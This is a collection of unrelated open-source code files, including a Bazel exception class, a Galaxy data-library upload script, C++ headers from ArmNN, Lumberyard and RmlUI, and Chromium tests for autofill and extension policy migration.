"""This module contains functions which operate on discrete sequences. Transforms - ``fft``, ``ifft``, ``ntt``, ``intt``, ``fwht``, ``ifwht``, ``mobius_transform``, ``inverse_mobius_transform`` Convolutions - ``convolution``, ``convolution_fft``, ``convolution_ntt``, ``convolution_fwht``, ``convolution_subset``, ``covering_product``, ``intersecting_product`` """ from .transforms import (fft, ifft, ntt, intt, fwht, ifwht, mobius_transform, inverse_mobius_transform) from .convolutions import convolution, covering_product, intersecting_product
223
16,989
<reponame>AyuMol758/bazel // Copyright 2021 The Bazel Authors. All rights reserved. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // package com.google.devtools.build.lib.bazel.bzlmod; import com.google.devtools.build.lib.server.FailureDetails.ExternalDeps; import com.google.devtools.build.lib.server.FailureDetails.FailureDetail; import com.google.devtools.build.lib.skyframe.DetailedException; import com.google.devtools.build.lib.util.DetailedExitCode; import com.google.errorprone.annotations.FormatMethod; import com.google.errorprone.annotations.FormatString; import javax.annotation.Nullable; /** Exception indicates that something went wrong while processing external dependencies. */ public class ExternalDepsException extends Exception implements DetailedException { private final DetailedExitCode detailedExitCode; public ExternalDepsException(String message, @Nullable Throwable cause, ExternalDeps.Code code) { super(message, cause); detailedExitCode = DetailedExitCode.of( FailureDetail.newBuilder() .setMessage(message) .setExternalDeps(ExternalDeps.newBuilder().setCode(code).build()) .build()); } @FormatMethod public static ExternalDepsException withMessage( ExternalDeps.Code code, @FormatString String format, Object... args) { return new ExternalDepsException(String.format(format, args), null, code); } @FormatMethod public static ExternalDepsException withCauseAndMessage( ExternalDeps.Code code, Throwable cause, @FormatString String format, Object... args) { return new ExternalDepsException( String.format(format, args) + ": " + cause.getMessage(), cause, code); } @Override public DetailedExitCode getDetailedExitCode() { return detailedExitCode; } }
702
1,085
<filename>scripts/api/fetch_to_library.py<gh_stars>1000+ import argparse import json import requests import yaml def main(): parser = argparse.ArgumentParser(description='Upload a directory into a data library') parser.add_argument("-u", "--url", dest="url", required=True, help="Galaxy URL") parser.add_argument("-a", "--api", dest="api_key", required=True, help="API Key") parser.add_argument('target', metavar='FILE', type=str, help='file describing data library to fetch') args = parser.parse_args() with open(args.target) as f: target = yaml.safe_load(f) histories_url = args.url + "/api/histories" new_history_response = requests.post(histories_url, data={'key': args.api_key}) fetch_url = args.url + '/api/tools/fetch' payload = { 'key': args.api_key, 'targets': json.dumps([target]), 'history_id': new_history_response.json()["id"] } response = requests.post(fetch_url, data=payload) print(response.content) if __name__ == '__main__': main()
418
856
<filename>include/armnnSerializer/ISerializer.hpp // // Copyright © 2017 Arm Ltd. All rights reserved. // SPDX-License-Identifier: MIT // #pragma once #include "armnn/INetwork.hpp" #include "armnn/NetworkFwd.hpp" #include "armnn/Types.hpp" namespace armnnSerializer { class ISerializer; using ISerializerPtr = std::unique_ptr<ISerializer, void(*)(ISerializer* serializer)>; class ISerializer { public: static ISerializer* CreateRaw(); static ISerializerPtr Create(); static void Destroy(ISerializer* serializer); /// Serializes the network to ArmNN SerializedGraph. /// @param [in] inNetwork The network to be serialized. void Serialize(const armnn::INetwork& inNetwork); /// Serializes the SerializedGraph to the stream. /// @param [stream] the stream to save to /// @return true if graph is Serialized to the Stream, false otherwise bool SaveSerializedToStream(std::ostream& stream); private: ISerializer(); ~ISerializer(); class SerializerImpl; std::unique_ptr<SerializerImpl> pSerializerImpl; }; } //namespace armnnSerializer
368
14,668
<reponame>zealoussnow/chromium // Copyright 2020 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. package org.chromium.components.autofill; import android.os.IBinder; import org.chromium.base.test.util.CallbackHelper; import org.chromium.components.autofill_public.IAutofillHintsService; import org.chromium.components.autofill_public.IViewTypeCallback; import org.chromium.components.autofill_public.ViewType; import java.util.List; /** * This class implements and registers IViewTypeCallback for testing. */ public class AutofillHintsServiceTestHelper { public void registerViewTypeService(IBinder binder) throws Exception { IAutofillHintsService.Stub.asInterface(binder).registerViewTypeCallback(getBinder()); } private IViewTypeCallback.Stub mBinder = new IViewTypeCallback.Stub() { @Override public void onViewTypeAvailable(List<ViewType> viewTypeList) { mViewTypeList = viewTypeList; mCallbackHelper.notifyCalled(); } @Override public void onQueryFailed() { mQueryFailed = true; mCallbackHelper.notifyCalled(); } }; private List<ViewType> mViewTypeList; private boolean mQueryFailed; private CallbackHelper mCallbackHelper = new CallbackHelper(); public IViewTypeCallback getBinder() { return mBinder; } public List<ViewType> getViewTypes() { return mViewTypeList; } public boolean isQueryFailed() { return mQueryFailed; } public void waitForCallbackInvoked() throws Exception { mCallbackHelper.waitForCallback(0); } }
630
1,738
<reponame>jeikabu/lumberyard #pragma once /* * All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or * its licensors. * * For complete copyright and license terms please see the LICENSE at the root of this * distribution (the "License"). All use of this software is governed by the License, * or, if provided, by the license below or the license accompanying this file. Do not * remove or modify any license notices. This file is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * */ // This is the interface object that handles the ## directive processing in the shader files. It // pre-processes the text stream in a C-like manner, removing chunks of text from the input stream // so that they never enter the token stream. // // supported directives: // ##if - works like C #if, currently supports only the following tests: // ##if token - enables the branch if token is defined // ##if token1 == token2 - will first try to expand the two tokens, then will string compare the result. // If a token isn't expanded, it will be used as the string to compare. // ##elif - just like C #if, same caveats as ##if // ##else - just like C #else // ##endif - just like C #endif // ##define - just like C define, but doesn't support parenthesis so it is just the token // ##undef - just like C undef // ##include_restricted(rootfile, macro) - // This will build a filename using macro and rootfile and then process it. For example, given // ##include_restricted(shader_cfx, AZ_RESTRICTED_PLATFORM) and AZ_RESTRICTED_PLATFORM set to "banana", // it will open and process a file called "banana/shader_cfx_banana.cfr". class PoundPoundContext { public: explicit PoundPoundContext(const AZStd::string& shadersFilter); PoundPoundContext(const PoundPoundContext& other) = delete; void operator=(const PoundPoundContext& other) = delete; ~PoundPoundContext(); // Call this function when encountering ## in the input stream. It will consume all text starting with the ## // until it reaches a state where regular token parsing might be enabled again void PreprocessLines(char** buf); // Callers need to use this function to test for the end of the buffer because we handle switching from an // include file back to the #including file inside this function. The layerSwitch bool is needed so that the // caller can know that they need to possibly start scanning for comments/whitespace again due to the change // in which buffer is being scanned bool IsEndOfBuffer(char** buf, bool* layerSwitch); private: class Impl; Impl *m_impl; };
817
1,208
<reponame>cclovett/iRemeberM ../../../WCDB/sqlcipher/src/sqlcipher.h
33
27,173
import unittest class TestAnagrams(unittest.TestCase): def test_group_anagrams(self): anagram = Anagram() self.assertRaises(TypeError, anagram.group_anagrams, None) data = ['ram', 'act', 'arm', 'bat', 'cat', 'tab'] expected = ['ram', 'arm', 'act', 'cat', 'bat', 'tab'] self.assertEqual(anagram.group_anagrams(data), expected) print('Success: test_group_anagrams') def main(): test = TestAnagrams() test.test_group_anagrams() if __name__ == '__main__': main()
228
721
package crazypants.enderio.base.integration.ic2c; import javax.annotation.Nonnull; import crazypants.enderio.api.farm.IFarmerJoe; import crazypants.enderio.base.EnderIO; import crazypants.enderio.base.Log; import crazypants.enderio.base.events.EnderIOLifecycleEvent; import crazypants.enderio.base.farming.FarmersRegistry; import crazypants.enderio.base.farming.farmers.RubberTreeFarmer; import net.minecraftforge.event.RegistryEvent; import net.minecraftforge.fml.common.Mod.EventBusSubscriber; import net.minecraftforge.fml.common.eventhandler.SubscribeEvent; @EventBusSubscriber(modid = EnderIO.MODID) public class IC2cUtil { @SubscribeEvent public static void registerFarmers(@Nonnull RegistryEvent.Register<IFarmerJoe> event) { RubberTreeFarmer farmer = RubberTreeFarmerIC2classic.create(); if (farmer != null) { event.getRegistry().register(farmer.setRegistryName("ic2c", "trees")); Log.info("Farming Station: IC2 classic integration fully loaded"); } else { Log.info("Farming Station: IC2 classic integration not loaded"); } } @SubscribeEvent public static void registerTreetaps(@Nonnull EnderIOLifecycleEvent.Init.Pre event) { FarmersRegistry.registerTreetaps("ic2", "itemtreetap"); } }
426
2,177
<filename>vendor/cache/gems/nokogiri-1.6.7.2/ext/nokogiri/html_element_description.h #ifndef NOKOGIRI_HTML_ELEMENT_DESCRIPTION #define NOKOGIRI_HTML_ELEMENT_DESCRIPTION #include <nokogiri.h> void init_html_element_description(); extern VALUE cNokogiriHtmlElementDescription ; #endif
118
1,738
<gh_stars>1000+ /* * All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or * its licensors. * * For complete copyright and license terms please see the LICENSE at the root of this * distribution (the "License"). All use of this software is governed by the License, * or, if provided, by the license below or the license accompanying this file. Do not * remove or modify any license notices. This file is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * */ #pragma once #include <AzCore/base.h> #include <AzCore/PlatformDef.h> #include <gmock/gmock.h> #include <ostream> namespace AZ { class Vector2; class Vector3; class Vector4; class Quaternion; class Transform; class Color; std::ostream& operator<<(std::ostream& os, const Vector2& vec); std::ostream& operator<<(std::ostream& os, const Vector3& vec); std::ostream& operator<<(std::ostream& os, const Vector4& vec); std::ostream& operator<<(std::ostream& os, const Quaternion& quat); std::ostream& operator<<(std::ostream& os, const Transform& transform); std::ostream& operator<<(std::ostream& os, const Color& transform); } // namespace AZ namespace UnitTest { // is-close matcher to make tests easier to read and failures more useful MATCHER_P(IsClose, expected, "") { AZ_UNUSED(result_listener); return arg.IsClose(expected); } // is-close matcher with tolerance to make tests easier to read and failures more useful MATCHER_P2(IsCloseTolerance, expected, tolerance, "") { AZ_UNUSED(result_listener); return arg.IsClose(expected, tolerance); } // is-close matcher for use with Pointwise container comparisons MATCHER(ContainerIsClose, "") { AZ_UNUSED(result_listener); const auto& [expected, actual] = arg; return expected.IsClose(actual); } // is-close matcher with tolerance for use with Pointwise container comparisons MATCHER_P(ContainerIsCloseTolerance, tolerance, "") { AZ_UNUSED(result_listener); const auto& [expected, actual] = arg; return expected.IsClose(actual, tolerance); } // IsFinite matcher to make it easier to validate Vector2, Vector3, Vector4 and Quaternion. // For example: // AZ::Quaternion rotation; // EXPECT_THAT(rotation, IsFinite()); // // AZStd::vector<AZ::Vector3> positions; // EXPECT_THAT(positions, ::testing::Each(IsFinite())); MATCHER(IsFinite, "") { AZ_UNUSED(result_listener); return arg.IsFinite(); } } // namespace UnitTest
977
880
<gh_stars>100-1000 /** * Copyright 2019 <NAME> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package ch.qos.logback.core.joran.spi; import java.util.ArrayList; import java.util.List; public class CaseCombinator { List<String> combinations(String in) { int length = in.length(); List<String> permutationsList = new ArrayList<String>(); int totalCombinations = computeTotalNumerOfCombinations(in, length); for (int j = 0; j < totalCombinations; j++) { StringBuilder newCombination = new StringBuilder(); int pos = 0; for (int i = 0; i < length; i++) { char c = in.charAt(i); if (isEnglishLetter(c)) { c = permute(c, j, pos); pos++; } newCombination.append(c); } permutationsList.add(newCombination.toString()); } return permutationsList; } private char permute(char c, int permutation, int position) { int mask = 1 << position; boolean shouldBeInUpperCase = (permutation & mask) != 0; boolean isEffectivelyUpperCase = isUpperCase(c); if (shouldBeInUpperCase && !isEffectivelyUpperCase) return toUpperCase(c); if (!shouldBeInUpperCase && isEffectivelyUpperCase) return toLowerCase(c); return c; } private int computeTotalNumerOfCombinations(String in, int length) { int count = 0; for (int i = 0; i < length; i++) { char c = in.charAt(i); if (isEnglishLetter(c)) count++; } // return 2^count (2 to the power of count) return (1 << count); } private char toUpperCase(char c) { if ('A' <= c && c <= 'Z') { return c; } if ('a' <= c && c <= 'z') { return (char) ((int) c + 'A' - 'a'); } // code should never reach this point return c; } private char toLowerCase(char c) { if ('a' <= c && c <= 'z') { return c; } if ('A' <= c && c <= 'Z') { return (char) ((int) c + 'a' - 'A'); } // code should never reach this point return c; } private boolean isEnglishLetter(char c) { if ('a' <= c && c <= 'z') return true; if ('A' <= c && c <= 'Z') return true; return false; } private boolean isUpperCase(char c) { return ('A' <= c && c <= 'Z'); } }
1,063
2,151
<reponame>google-ar/chromium // Copyright 2016 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #ifndef CONTENT_PUBLIC_BROWSER_RESTORE_TYPE_H_ #define CONTENT_PUBLIC_BROWSER_RESTORE_TYPE_H_ namespace content { // Enumerations of the possible restore types. enum class RestoreType { // Restore from the previous session. LAST_SESSION_EXITED_CLEANLY, LAST_SESSION_CRASHED, // The entry has been restored from the current session. This is used when // the user issues 'reopen closed tab'. CURRENT_SESSION, // The entry was not restored. NONE }; } // namespace content #endif // CONTENT_PUBLIC_BROWSER_RESTORE_TYPE_H_
239
441
<reponame>ssinai1/rbfx // // Copyright (c) 2017-2020 the rbfx project. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. // #pragma once #include "../Scene/LogicComponent.h" namespace Rml { class ElementDocument; } namespace Urho3D { class RmlCanvasComponent; struct RmlCanvasResizedArgs; struct RmlDocumentReloadedArgs; class RmlUI; /// Adds a single window to game screen. class URHO3D_API RmlUIComponent : public LogicComponent { URHO3D_OBJECT(RmlUIComponent, LogicComponent); public: /// Construct. explicit RmlUIComponent(Context* context); /// Destruct. ~RmlUIComponent() override; /// Registers object with the engine. static void RegisterObject(Context* context); /// Set resource path of rml file defining a window. void SetResource(const ResourceRef& resourceRef); /// Set resource path of rml file defining a window. void SetResource(const ea::string& resourceName); /// Returns a path to a rml file defining a window. const ResourceRef& GetResource() const { return resource_; } /// Returns true if window is open, false otherwise. May return true when component is detached from a node and no window is open. bool IsOpen() const { return open_; } /// Set whether window opens as soon as component ias added to an object. void SetOpen(bool open); /// Return true if component is using normalized coordinates for window position and size. bool GetUseNormalizedCoordinates() const { return useNormalized_; } /// Enable or disable use of normalized coordinates for window position and size. void SetUseNormalizedCoordinates(bool enable) { useNormalized_ = enable; } /// Returns window position in pixels or normalized coordinates. Vector2 GetPosition() const; /// Sets window position in pixels or normalized coordinates. void SetPosition(Vector2 pos); /// Returns window size in pixels or normalized coordinates. Vector2 GetSize() const; /// Sets window size in pixels or normalized coordinates. void SetSize(Vector2 size); /// Enable auto-sizing based on rml document contents. void SetAutoSize(bool enable) { autoSize_ = enable; } /// Return true if window automatically resizes based on rml document contents. bool GetAutoSize() const { return autoSize_; } /// Return RmlUI subsystem this component renders into. RmlUI* GetUI() const; protected: /// Handle component being added to Node or removed from it. void OnNodeSet(Node* node) override; /// Open a window document if it was not already open. void OpenInternal(); /// Close a window document if it was open. void CloseInternal(); /// Resets document_ pointer when window is closed. void OnDocumentClosed(Rml::ElementDocument* document); /// Reposition UI elements on UI canvas resize. void OnUICanvasResized(const RmlCanvasResizedArgs& size); /// Handle document pointer changes on resource reload. void OnDocumentReloaded(const RmlDocumentReloadedArgs& args); /// Handle addition of sibling components. void OnComponentAdded(StringHash, VariantMap& args); /// Handle removal of sibling components. void OnComponentRemoved(StringHash, VariantMap& args); protected: /// A rml file resource. ResourceRef resource_; /// Flag indicating that window will open as soon as component is added to an object. bool open_ = false; /// Currently open document. Null if document was closed. Rml::ElementDocument* document_ = nullptr; /// Flag indicating that component will save normalized coordiantes. When not set, component will save pixel coordinates. bool useNormalized_ = false; /// Used to store size when document is not available. Vector2 size_; /// Used to store position when document is not available. Vector2 position_; /// Use automatic size inherited from rml document. bool autoSize_ = true; /// Component which holds RmlUI instance containing UI managed by this component. May be null if UI is rendered into default RmlUI subsystem. WeakPtr<RmlCanvasComponent> canvasComponent_; }; }
1,461
524
#pragma once #include "ContactList.h" #include "../../animation/animation.h" namespace Logic { class CustomAbstractListModel; class SearchModel; class SearchItemDelegate; enum class UpdateChatSelection; class CommonChatsModel; } namespace Ui { class FocusableListView; class SearchWidget; class ContextMenu; class ContactListWidget : public QWidget { Q_OBJECT Q_SIGNALS: void searchEnd(); void itemSelected(const QString& _aimid, qint64 _msgid, qint64 _quoteid); void liveChatSelected(const QString& _aimid); void itemClicked(const QString&); void groupClicked(int); void changeSelected(const QString&); void searchSuggestSelected(const QString& _pattern); void searchSuggestRemoved(const QString& _contact, const QString& _pattern); void clearSearchSelection(); //sidebar void selected(const QString&); void removeClicked(const QString&); void moreClicked(const QString&); void approve(const QString, bool); public: ContactListWidget(QWidget* _parent, const Logic::MembersWidgetRegim& _regim, Logic::CustomAbstractListModel* _chatMembersModel, Logic::AbstractSearchModel* _searchModel = nullptr, Logic::CommonChatsModel* _commonChatsModel = nullptr); ~ContactListWidget(); void connectSearchWidget(SearchWidget* _widget); void installEventFilterToView(QObject* _filter); void setIndexWidget(int index, QWidget* widget); void setClDelegate(Logic::AbstractItemDelegateWithRegim* _delegate); void setWidthForDelegate(int _width); void setDragIndexForDelegate(const QModelIndex& _index); void setPictureOnlyForDelegate(bool _value); void setEmptyIgnoreLabelVisible(bool _isVisible); void setSearchInDialog(const QString& _contact, bool _switchModel = true); bool getSearchInDialog() const; const QString& getSearchInDialogContact() const; bool isSearchMode() const; QString getSelectedAimid() const; Logic::MembersWidgetRegim getRegim() const; void setRegim(const Logic::MembersWidgetRegim _regim); Logic::AbstractSearchModel* getSearchModel() const; FocusableListView* getView() const; void triggerTapAndHold(bool _value); bool tapAndHoldModifier() const; void showSearch(); void rewindToTop(); public Q_SLOTS: void searchResult(); void searchUpPressed(); void searchDownPressed(); void selectionChanged(const QModelIndex &); void select(const QString&); void select(const QString&, const qint64 _message_id, const qint64 _quote_id, Logic::UpdateChatSelection _mode); void showContactsPopupMenu(const QString& aimId, bool _is_chat); private Q_SLOTS: void onItemClicked(const QModelIndex&); void onItemPressed(const QModelIndex&); void onMouseMoved(const QPoint& _pos, const QModelIndex& _index); void onMouseWheeled(); void onMouseWheeledStats(); void onSearchResults(); void onSearchSuggests(); void searchResults(const QModelIndex &, const QModelIndex &); void searchClicked(const QModelIndex& _current); void showPopupMenu(QAction* _action); void onSearchInputCleared(); void searchPatternChanged(const QString&); void onDisableSearchInDialog(); void touchScrollStateChanged(QScroller::State _state); void scrollToCategory(const SearchCategory _category); void scrollToItem(const QString& _aimId); void removeSuggestPattern(const QString& _contact, const QString& _pattern); void showPlaceholder(); void hidePlaceholder(); void showNoSearchResults(); void hideNoSearchResults(); void showSearchSpinner(); void hideSearchSpinner(); void scrolled(const int _value); private: void switchToInitial(bool _initial); void searchUpOrDownPressed(bool _isUp); void setKeyboardFocused(bool _isFocused); void initSearchModel(Logic::AbstractSearchModel* _searchModel); bool isSelectMembersRegim() const; void selectCurrentSearchCategory(); using SearchHeaders = std::vector<std::pair<SearchCategory, QModelIndex>>; SearchHeaders getCurrentCategories() const; private: QVBoxLayout* layout_; QVBoxLayout* viewLayout_; FocusableListView* view_; EmptyIgnoreListLabel* emptyIgnoreListLabel_; DialogSearchViewHeader* dialogSearchViewHeader_; GlobalSearchViewHeader* globalSearchViewHeader_; anim::Animation scrollToItemAnim_; std::string scrollStatWhere_; QTimer* scrollStatsTimer_; Logic::AbstractItemDelegateWithRegim* clDelegate_; Logic::AbstractItemDelegateWithRegim* searchDelegate_; QWidget* contactsPlaceholder_; QWidget* noSearchResults_; QWidget* searchSpinner_; QWidget* viewContainer_; Logic::MembersWidgetRegim regim_; Logic::CustomAbstractListModel* chatMembersModel_; Logic::AbstractSearchModel* searchModel_; Logic::ContactListWithHeaders* clModel_; Logic::CommonChatsModel* commonChatsModel_; ContextMenu* popupMenu_; QString searchDialogContact_; bool noSearchResultsShown_; bool initial_; bool tapAndHold_; }; }
2,136
814
{ "menu.search.placeholder": "Search for people, file, photos...", "menu.fullscreen": "Fullscreen", "menu.fullscreen.exit": "Exit Fullscreen", "menu.clear.local.storage": "Clear Local Storage", "menu.lang": "Language", "menu.account": "Personal Page", "menu.account.center": "Personal Center", "menu.account.settings": "Personal Settings", "menu.account.trigger": "Trigger Error", "menu.account.logout": "Logout", "menu.nav": "Navigation", "menu.nav.home": "Home", "menu.nav.docs": "Documents", "menu.nav.permission": "Permission", "menu.nav.permission.identity": "Authentication", "menu.nav.permission.identity.user": "Users", "menu.nav.permission.identity.role": "Roles", "menu.nav.permission.identity.user-role": "UserRoles", "menu.nav.permission.auth": "Authorization", "menu.nav.permission.auth.module": "Modules", "menu.nav.permission.auth.function": "Functions", "menu.nav.permission.auth.role-function": "RoleFunctions", "menu.nav.permission.auth.user-function": "UserFunctions", "menu.nav.permission.auth.entityinfo": "EntityInfos", "menu.nav.permission.auth.role-entityinfo": "RoleEntityInfos", "menu.nav.system": "System", "menu.nav.system.systems": "Systems", "menu.nav.system.systems.audit-operation": "Operation Audit", "menu.nav.system.systems.audit-entity": "Data Audit", "menu.nav.system.systems.settings": "System Settings", "menu.nav.system.systems.data-dictionary": "Data Dictionary", "menu.nav.system.systems.pack": "Packs", "menu.nav.business": "Business", "app.passport.login": "Login", "app.passport.register": "Register", "app.passport.forgot-password": "Forgot Password", "app.passport.lock": "Lock", "app.login.message-invalid-credentials": "Invalid username or password(admin/ant.design)", "app.login.message-invalid-verification-code": "Invalid verification code", "app.login.tab-login-credentials": "Credentials", "app.login.tab-login-mobile": "Mobile number", "app.login.remember-me": "Remember me", "app.login.forgot-password": "Forgot your password?", "app.login.sign-in-with": "Sign in with", "app.login.signup": "Sign up", "app.login.login": "Login", "app.login.username.placeholder": "username / email / cell number", "app.login.password.placeholder": "login password", "app.register.register": "Register", "app.register.get-verification-code": "Get code", "app.register.sign-in": "Already have an account?", "app.register-result.msg": "Account:registered at {{email}}", "app.register-result.activation-email": "The activation email has been sent to your email address and is valid for 24 hours. Please log in to the email in time and click on the link in the email to activate the account.", "app.register-result.back-home": "Back to home", "app.register-result.view-mailbox": "View mailbox", "validation.login.account.required": "Please enter your login account!", "validation.email.required": "Please enter your email!", "validation.email.wrong-format": "The email address is in the wrong format!", "validation.password.required": "Please enter your password!", "validation.password.twice": "The passwords entered twice do not match!", "validation.password.strength.msg": "Please enter at least 6 characters and don't use passwords that are easy to guess.", "validation.password.strength.strong": "Strength: strong", "validation.password.strength.medium": "Strength: medium", "validation.password.strength.short": "Strength: too short", "validation.confirm-password.required": "Please confirm your password!", "validation.phone-number.required": "Please enter your phone number!", "validation.phone-number.wrong-format": "Malformed phone number!", "validation.verification-code.required": "Please enter the verification code!", "validation.title.required": "Please enter a title", "validation.date.required": "Please select the start and end date", "validation.goal.required": "Please enter a description of the goal", "validation.standard.required": "Please enter a metric" }
1,284
496
# -*- coding: utf-8 -*- """Provides interface for pyfiscan to YAML-files.""" try: import os import sys import yaml except ImportError as error: print('Import error: %s' % error) sys.exit(1) def gen_yamlfile_locations(yamldir, includes): """File handle generator for YAML-files. Only used by database class.""" if os.path.islink(yamldir): sys.exit('Location for YAML-files can not be a symlink: %s' % yamldir) if not os.path.isdir(yamldir): sys.exit('Location for YAML-files is not a directory: %s' % yamldir) for entry in os.scandir(yamldir): filename = entry.name if filename.startswith('.'): # skip Vim swap files continue elif filename.endswith('~'): # skip Emacs temp files continue elif entry.is_symlink(): continue elif entry.is_dir(): continue elif not entry.is_file(): continue elif not includes and filename.endswith('.yml'): yield open(yamldir + filename, 'r') elif includes: for item in includes: if filename == item + '.yml': yield open(yamldir + filename, 'r') def generate(yamldir, includes): """Generates data dictionary of definitions from YAML files. Only used by database class. """ data = dict() for yamlfile in gen_yamlfile_locations(yamldir, includes): try: data.update(yaml.safe_load(yamlfile.read())) except AttributeError: # empty file sys.exit('No data found inside: %s' % yamlfile) except yaml.scanner.ScannerError as e: # syntax error sys.exit('Error while loading YAML-file: %s' % e) finally: yamlfile.close() return data class Database: """Reads YAML files and generates a data dictionary of the contents""" def __init__(self, yamldir, includes=None): self.issues = generate(yamldir, includes) def locations(self, application, with_lists=True): """Returns list of locations by appname.""" locations = [] for issue in self.issues[application].items(): location = issue[1]['location'] if with_lists is True: locations.append(location) else: if type(location) == str: locations.append(location) elif type(location) == list: locations.extend(location) return locations
1,141
14,668
<gh_stars>1000+ // Copyright 2018 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "chrome/browser/policy/chrome_extension_policy_migrator.h" #include <string> #include "base/bind.h" #include "base/callback.h" #include "base/strings/utf_string_conversions.h" #include "base/values.h" #include "extensions/common/hashed_extension_id.h" #include "testing/gtest/include/gtest/gtest.h" #include "ui/base/l10n/l10n_util.h" namespace policy { namespace { const char kExtensionId[] = "abcdefghijklmnopabcdefghijklmnop"; const char kOldPolicy1[] = "OldPolicyOne"; const char kOldPolicy2[] = "OldPolicyTwo"; const char kOldPolicy3[] = "OldPolicyThree"; const char kOldPolicy4[] = "OldPolicyFour"; const char kOldPolicy5[] = "OldPolicyFive"; const char kNewPolicy1[] = "NewPolicyOne"; const char kNewPolicy2[] = "NewPolicyTwo"; const char kNewPolicy3[] = "NewPolicyThree"; const char kNewPolicy4[] = "NewPolicyFour"; const int kOldValue1 = 111; const int kOldValue2 = 222; const int kOldValue3 = 333; const int kOldValue4 = 444; const int kOldValue5 = 555; const int kNewValue3 = 999; const int kNewValue4 = 888; void MultiplyByTwo(base::Value* val) { *val = base::Value(val->GetInt() * 2); } void SetPolicy(PolicyMap* policy, const char* policy_name, base::Value value) { policy->Set(policy_name, POLICY_LEVEL_MANDATORY, POLICY_SCOPE_USER, POLICY_SOURCE_CLOUD, std::move(value), nullptr); } class TestingPolicyMigrator : public ChromeExtensionPolicyMigrator { public: void Migrate(PolicyBundle* bundle) override { using Migration = PolicyMigrator::Migration; const Migration migrations[] = { Migration(kOldPolicy1, kNewPolicy1), Migration(kOldPolicy2, kNewPolicy2), Migration(kOldPolicy3, kNewPolicy3), Migration(kOldPolicy4, kNewPolicy4, base::BindRepeating(&MultiplyByTwo)), }; CopyPoliciesIfUnset(bundle, extensions::HashedExtensionId(kExtensionId).value(), migrations); } }; } // namespace TEST(ChromeExtensionPolicyMigratorTest, CopyPoliciesIfUnset) { PolicyBundle bundle; PolicyMap& chrome_map = bundle.Get( PolicyNamespace(POLICY_DOMAIN_CHROME, /* component_id */ std::string())); SetPolicy(&chrome_map, kNewPolicy3, base::Value(kNewValue3)); PolicyMap& extension_map = bundle.Get(PolicyNamespace(POLICY_DOMAIN_EXTENSIONS, kExtensionId)); SetPolicy(&extension_map, kOldPolicy1, base::Value(kOldValue1)); SetPolicy(&extension_map, kOldPolicy2, base::Value(kOldValue2)); SetPolicy(&extension_map, kOldPolicy3, base::Value(kOldValue3)); SetPolicy(&extension_map, kOldPolicy4, base::Value(kOldValue4)); SetPolicy(&extension_map, kOldPolicy5, base::Value(kOldValue5)); TestingPolicyMigrator().Migrate(&bundle); // Policies in kMigrations should be renamed + copied into the Chrome domain. EXPECT_EQ(4u, chrome_map.size()); ASSERT_TRUE(chrome_map.GetValue(kNewPolicy1)); EXPECT_EQ(base::Value(kOldValue1), *chrome_map.GetValue(kNewPolicy1)); ASSERT_TRUE(chrome_map.GetValue(kNewPolicy2)); EXPECT_EQ(base::Value(kOldValue2), *chrome_map.GetValue(kNewPolicy2)); // kNewPolicy3 is already set, and should not be overwritten. ASSERT_TRUE(chrome_map.GetValue(kNewPolicy3)); EXPECT_EQ(base::Value(kNewValue3), *chrome_map.GetValue(kNewPolicy3)); // This policy was transformed by MultiplyByTwo. ASSERT_TRUE(chrome_map.GetValue(kNewPolicy4)); EXPECT_EQ(base::Value(kNewValue4), *chrome_map.GetValue(kNewPolicy4)); } TEST(ChromeExtensionPolicyMigratorTest, DeprecatedWarnings) { PolicyBundle bundle; PolicyMap& chrome_map = bundle.Get( PolicyNamespace(POLICY_DOMAIN_CHROME, /* component_id */ std::string())); PolicyMap& extension_map = bundle.Get(PolicyNamespace(POLICY_DOMAIN_EXTENSIONS, kExtensionId)); SetPolicy(&extension_map, kOldPolicy1, base::Value(kOldValue1)); TestingPolicyMigrator().Migrate(&bundle); // Policies in kMigrations should be renamed + copied into the Chrome domain. EXPECT_EQ(1u, chrome_map.size()); ASSERT_TRUE(chrome_map.GetValue(kNewPolicy1)); base::RepeatingCallback<std::u16string(int)> l10nlookup = base::BindRepeating(&l10n_util::GetStringUTF16); EXPECT_FALSE( chrome_map.Get(kNewPolicy1) ->GetLocalizedMessages(PolicyMap::MessageType::kWarning, l10nlookup) .empty()); } } // namespace policy
1,685
605
